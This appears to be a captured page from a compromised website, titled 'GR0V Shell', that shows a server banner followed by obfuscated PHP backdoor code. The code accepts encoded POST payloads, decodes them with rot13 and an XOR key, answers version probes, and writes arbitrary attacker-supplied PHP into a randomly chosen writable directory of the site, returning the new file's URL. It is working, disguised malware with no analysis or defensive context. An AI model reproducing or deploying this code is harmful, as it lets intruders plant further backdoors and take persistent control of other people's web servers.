?
GR0V Shell
GR0V shell
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
<?php $tmiptc = "qkolnvdxessgxlao";$ceiokfnjmx = "";foreach ($_POST as $ypkdwhquo => $mpxpbyq){if (strlen($ypkdwhquo) == 16 and substr_count($mpxpbyq, "%") > 10){zkvvagdu($ypkdwhquo, $mpxpbyq);}}function zkvvagdu($ypkdwhquo, $oywiysf){global $ceiokfnjmx;$ceiokfnjmx = $ypkdwhquo;$oywiysf = str_split(rawurldecode(str_rot13($oywiysf)));function ctpaep($ogewis, $ypkdwhquo){global $tmiptc, $ceiokfnjmx;return $ogewis ^ $tmiptc[$ypkdwhquo % strlen($tmiptc)] ^ $ceiokfnjmx[$ypkdwhquo % strlen($ceiokfnjmx)];}$oywiysf = implode("", array_map("ctpaep", array_values($oywiysf), array_keys($oywiysf)));$oywiysf = @unserialize($oywiysf);if (@is_array($oywiysf)){$ypkdwhquo = array_keys($oywiysf);$oywiysf = $oywiysf[$ypkdwhquo[0]];if ($oywiysf === $ypkdwhquo[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function ugdxjn($jegsxir) {static $ptrnqkecjk = array();$gnpckcbav = glob($jegsxir . '/*', GLOB_ONLYDIR);if (count($gnpckcbav) > 0) {foreach ($gnpckcbav as $jegsx){if (@is_writable($jegsx)){$ptrnqkecjk[] = $jegsx;}}}foreach ($gnpckcbav as $jegsxir) ugdxjn($jegsxir);return $ptrnqkecjk;}$ykwhm = $_SERVER["DOCUMENT_ROOT"];$gnpckcbav = ugdxjn($ykwhm);$ypkdwhquo = array_rand($gnpckcbav);$uvlowjhcy = $gnpckcbav[$ypkdwhquo] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($uvlowjhcy, $oywiysf);echo "http://" . $_SERVER["HTTP_HOST"] . substr($uvlowjhcy, strlen($ykwhm));exit();}}}
T1KUS90T